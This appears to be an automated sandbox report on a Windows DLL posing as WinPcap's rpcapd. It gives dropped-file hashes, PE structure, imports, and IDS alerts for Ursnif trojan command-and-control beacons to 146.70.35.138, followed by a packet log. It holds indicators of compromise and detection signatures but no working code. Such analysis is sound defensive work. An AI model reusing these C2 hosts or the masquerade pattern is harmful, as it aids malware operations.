SHA-512: | 785520C461DF2D2ABFFD907C65A3656B50232434394EA4CE68D02BBC5569D2D3EB307DA67ADCD9C9CE8FD99F9FC0AA888E4456CF642EA1AC3E72D14B7C470FD5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4564 |
Entropy (8bit): | 4.439548228059502 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zs6JgtWI9PnWgc8sqYjhx8fm8M4J2+voFI+q84acupKcQIcQw0kd:uITfIoWgrsqY1WJVBO/pKkw0kd |
MD5: | DF03F167543BFE5B6CDEF17CD6CDB700 |
SHA1: | 6BBC61B7DBF6EB32A530D87A971944CDD312120D |
SHA-256: | 84B755FD6CFD16130CE8987B8BBE160B50DAB6E97F05AB376C74909198264B80 |
SHA-512: | 504C3F517AFEBFE84B4641320FCCB9107C42081F8A6A8672E073F46341DF6CF43569F29E69B8623EC2F86F32A92262FD58EB57FBA10F4F81EACBD4AD6E3E719E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 11606 |
Entropy (8bit): | 4.8910535897909355 |
Encrypted: | false |
SSDEEP: | 192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ |
MD5: | F84F6C99316F038F964F3A6DB900038F |
SHA1: | C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1 |
SHA-256: | F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E |
SHA-512: | E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.985489714311352 |
Encrypted: | false |
SSDEEP: | 24:Hre9ERhfpaDfHVhKdNWI+ycuZhNPHqakSGHbPNnq9qd:LSjKd41ulPqa30Rq9K |
MD5: | 67C978F8F6E761129B658BABBAC2C0E3 |
SHA1: | 02E6453D6EA95F5A0EBB0631D927EE771F4B7B0A |
SHA-256: | 9BB6FB8D9FDC155D50F117D1CE410A264593B74F41FEA700ED29099228FA1C4A |
SHA-512: | 78B24238F9F3B4FCF3507F65C29D5F7BA58EBD9866A22239C476D50CDF207B93030B71584F41784CBB2DECB40C888689A5C7BD9953555770ACCCA9954B5A23BD |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.965326095070505 |
Encrypted: | false |
SSDEEP: | 24:HJe9EuZfTDQDfHLWhKdNWI+ycuZhNsrakSPEPNnq9qd:ABTqrMKd41ulsra3PEq9K |
MD5: | E34239A621ECB61A5F50016AE522485A |
SHA1: | EDD24063A2BC018FA0F98951A747630C5925D5FE |
SHA-256: | E0F555AAE679A2E77185A2DAD637DAD6F1477AEA45415837C204061570AC891E |
SHA-512: | 5DBA844206EEA3E6E4EC60343E5AA08271F863EC568A169E9EB0904C0D4979CDC5435999ABA05E08CF6AD6DC29078C89CF6C0AC8509D7C3CB4DBEB7D60DECED1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.0806512987018424 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKrak7YnqqPEPN5Dlq5J:+RI+ycuZhNsrakSPEPNnqX |
MD5: | 8C7366A75D058E4560576098B53C2E89 |
SHA1: | 5474E9C863C4BB1B86DA13FEB1DCBAC13BEA6A83 |
SHA-256: | 045887EA02E67AD0120E0D470B59C58099BFDBA859F1F3E31989AE8800BC7765 |
SHA-512: | CDA6B16F3E42B84FB648CD74482E2B7C4B9E2EB463F8D24A96E3893AD7667D9CBC094AE597AF695AD032ADA6CADE89F3E891EC2F6896966882516BBE7DBC3BF1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 417 |
Entropy (8bit): | 5.038440975503667 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny |
MD5: | AE91D1351B9FB773FEF9B6F31D0A22EE |
SHA1: | 323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31 |
SHA-256: | 2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD |
SHA-512: | 94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.246210484932597 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fbNOzxs7+AEszIwkn23fbNYA:p37Lvkmb6KRfT4WZEifT1 |
MD5: | 1DFF526FD701241566C75FC5465D31AF |
SHA1: | 5D91CBBE8D1F790F3A38CE35DAB4F705A0BEEF6E |
SHA-256: | ED2CAE80D53441FB70A3307AEB276D80C5D4176F9A9D336B5C87305DC0064ACF |
SHA-512: | E38E5E1D62A47ACAE2F46256453F82352BD5A6AF881D21EB8EC317AB60B4AE452E95E018271A9DD44FA9176799BFE8FB05E5359AF14399820DF6EDAECE85B2D5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6501357671778076 |
Encrypted: | false |
SSDEEP: | 24:etGSzMWWOJy853Ek0s2E7OgDdWQzbtkZfkd2OWI+ycuZhNsrakSPEPNnq:6pvz5UkGE7vxWQzqJkd211ulsra3PEq |
MD5: | 0DB7703243576F0A4B5D43BDB20FD12B |
SHA1: | 67974086EB1D388F41FA3D91AB2BE5C6EE06D2CF |
SHA-256: | 6B514B672F123A4399CAE02C921B046A1FC00D0A01C34B758A7D14F92E1C8BE1 |
SHA-512: | 0962E8886173F666E25787071C9794A4A158FAC0226AE3B19E9E954EC2088268172F1F4AE23671A74BF47E715048082E3E7904B32C5EAF74B0EBBE30A6117A2F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.325866700512367 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfTJEifTQKaM5DqBVKVrdFAMBJTH:Akka6CTJEuTQKxDcVKdBJj |
MD5: | EE4CA1452DEB397DB57596D3E6012A15 |
SHA1: | E8C4E64E4E2C6AE91EB3B78C460A8D65FB9377EA |
SHA-256: | 102035269C1F6AC6AECEC5D33A268EDB5A33E3BBA56F775441E271EF9C71A7CC |
SHA-512: | EBEB340BC62C181C89B1694C8DBB2D55326A7F19D987686A5A0F7E1B0A59A2824E488CFDD710F2FFABD8683F8038E0FA5163929004F631216B1EA355FD11BE35 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.089404989746942 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1Hqak7YnqqGHbPN5Dlq5J:+RI+ycuZhNPHqakSGHbPNnqX |
MD5: | 611F888895B72D1096C460FF7EA5E4B7 |
SHA1: | 67CCD8B6129567C2A7CF8B601FD2709FA13D13D0 |
SHA-256: | FFF630440C6AC27F1A70771D2279FE270829A76357941949BA22EB16BD260D6F |
SHA-512: | 0FB11E6584AA80780E1C263285F568A6C77773F35D7A3724692C2B8DD0A0E52D3A8CAA2D4F434F69109650B9243DC474C8EA2BD5C157C8734C297E5584912CA6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 411 |
Entropy (8bit): | 5.082169696837192 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy |
MD5: | 248E15CD19191D4333303E0E1F8E9A70 |
SHA1: | 9896EF9708F81AE4E3F2CA86329AD6BD82C700C3 |
SHA-256: | 0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF |
SHA-512: | 8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.22267238940763 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23ftUsX0zxs7+AEszIwkn23ftUs2WH:p37Lvkmb6KRf2sEWZEif2sxH |
MD5: | 7261F6CD6A6D4860AC034E27509DC55F |
SHA1: | C1282BE561B76009A43FD5BC192CE9D76AF08272 |
SHA-256: | F7F9574C754A9C5B3A633B90174E4FAC3FBB9D5657E79D07D9CAAF0BAA8FE5EA |
SHA-512: | CBB1190E96E9929BD12DEB50F2916777C8B8845630DE251A733A49567E7DD290F27673B0918D30B4C6691A0142EEF8A4802D6123DC8BECE77E5CA943CD609813 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6369801237092227 |
Encrypted: | false |
SSDEEP: | 24:etGSh8+mUE7R853RY0kCGs+4I4tkZfmPqDZ0WI+ycuZhNPHqakSGHbPNnq:63XE7S505Jm0ZX1ulPqa30Rq |
MD5: | 21F3C262E8990FE0E1A44D58B448B899 |
SHA1: | 2CD298766EC3E59F36C316B35BB0728368117153 |
SHA-256: | D594A1A6D450503AB6BDDC352174CC5F680F84CBEEAC0483BB064BA27CB381F0 |
SHA-512: | 2975E0F079F3D0360854A1249B7A1FBAB7AE5EA851F3A6924302135C03A8DA9E44310CA7E9D82BC672C67755A121B01016B680FE97B060384C3EECF3EE9F9C23 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.327904541660146 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRf2SEif2eOKaM5DqBVKVrdFAMBJTH:Akka6C2SEu2eOKxDcVKdBJj |
MD5: | 51149F7278FBC7AB67B11D6B7BF38CF0 |
SHA1: | 15D9E224C099E0795568A20DAFACEEA4BF50D88A |
SHA-256: | 6477E4EF8AF1EEA40F7734141A2CA95216DCD1BC01C53397ADBEABD2913543CB |
SHA-512: | DCB5699FB0966FF9D79A08AB874CDC2106FD74133878789C469A2EA31970A4B4FBBA138916763DF2C0EAEC64D45120E5A17D1EB5DA7B2D876098DBB4ACED025C |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.112861669562404 |
TrID: | |
File name: | VoevdOQpeU.dll |
File size: | 640699 |
MD5: | ba155d8aed7ca303fcfc3f0248d218e1 |
SHA1: | 600453c21cdbecdbea9c825df4754b8a1829d649 |
SHA256: | a5ea92139f59d185548e8f48d1ce65cbf54bf1e3e1930de221091017fd1d4f0a |
SHA512: | 5b58791e43d9fef57d3233ab015ea0609901ab5d7cc70b6a4d0291ea38e0082af06ba9a8996b6ac822d00f9dc3bf014bb5aabeebd5bf480f92e23372e0850582 |
SSDEEP: | 12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZB:+w1lEKOpuYxiwkkgjAN8ZB |
TLSH: | 12D4BD1A029B2102EBB6CE78A751636C54574CE09B01E2CFC9190DA395E34FBF4FA5ED |
File Content Preview: | MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{....................... |
Icon Hash: | 74f0e4ecccdce0e4 |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | fd1c62e6f93e304a27347077f6d2b44c |
Signature Valid: | |
Signature Issuer: | |
Signature Validation Error: | |
Error Number: | |
Not Before, Not After | |
Subject Chain | |
Version: | |
Thumbprint MD5: | |
Thumbprint SHA-1: | |
Thumbprint SHA-256: | |
Serial: |
Instruction |
---|
jmp 00007F89EC4AA38Dh |
jmp 00007F89EC4DAAF8h |
jmp 00007F89EC4AA073h |
jmp 00007F89EC4A9D2Eh |
jmp 00007F89EC4AA149h |
jmp 00007F89EC4A9B84h |
jmp 00007F89EC4DFF6Fh |
jmp 00007F89EC4A9C8Ah |
jmp 00007F89EC4D32E5h |
jmp 00007F89EC4E31A0h |
jmp 00007F89EC4DEE0Bh |
jmp 00007F89EC4E4366h |
jmp 00007F89EC4A9C01h |
jmp 00007F89EC4D441Ch |
jmp 00007F89EC4E6A37h |
jmp 00007F89EC4DDCE2h |
jmp 00007F89EC4D549Dh |
jmp 00007F89EC4AA0B8h |
jmp 00007F89EC4E99D3h |
jmp 00007F89EC4A9DDEh |
jmp 00007F89EC4E5599h |
jmp 00007F89EC4DBBC4h |
jmp 00007F89EC4D64AFh |
jmp 00007F89EC4E53BAh |
jmp 00007F89EC4AA055h |
jmp 00007F89EC4E0F90h |
jmp 00007F89EC4D89EBh |
jmp 00007F89EC4E8AF6h |
jmp 00007F89EC4D78B1h |
jmp 00007F89EC4AA04Ch |
jmp 00007F89EC4A9BC7h |
jmp 00007F89EC4E20D2h |
jmp 00007F89EC4E7A4Dh |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
Programming Language: | |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_VERSION | 0x98170 | 0x3d0 | data |
DLL | Import |
---|---|
WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification |
msvcrt.dll | toupper |
USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW |
OLEAUT32.dll | LHashValOfNameSysA |
SHELL32.dll | FindExecutableW |
KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA |
Secur32.dll | InitializeSecurityContextW |
ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner |
GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW |
Description | Data |
---|---|
LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino. |
InternalName | rpcapd |
FileVersion | 4.0.0.1040 |
CompanyName | CACE Technologies |
LegalTrademarks | |
ProductName | WinPcap |
ProductVersion | 4.0.0.1040 |
FileDescription | Remote Packet Capture Daemon |
Build Description | |
OriginalFilename | rpcapd.exe |
Translation | 0x0000 0x04b0 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/23/22-08:12:19.910177 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
04/23/22-08:12:21.823792 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
04/23/22-08:11:59.593120 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.42.16 |
04/23/22-08:12:20.776897 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 23, 2022 08:12:19.885525942 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:19.909297943 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:19.909377098 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:19.910176992 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:19.933670998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288152933 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288214922 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288245916 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288285017 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288319111 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288326025 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288357973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288367033 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288398027 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288400888 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288439989 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288469076 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288495064 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288507938 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288549900 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288579941 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288608074 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288620949 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288661957 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288741112 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.328840971 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328908920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328913927 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328938007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328944921 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.328954935 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328972101 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328991890 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.328993082 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329011917 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329025984 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329035044 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329041004 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329042912 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329065084 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329070091 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329091072 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329108000 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329138994 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329176903 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329232931 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329248905 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329309940 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329349995 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329365969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329461098 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329534054 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329545975 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329549074 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369694948 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369724989 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369743109 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369766951 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369785070 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369803905 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369812965 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369837999 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369841099 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369853973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369879007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369882107 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369931936 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.370174885 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.370202065 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
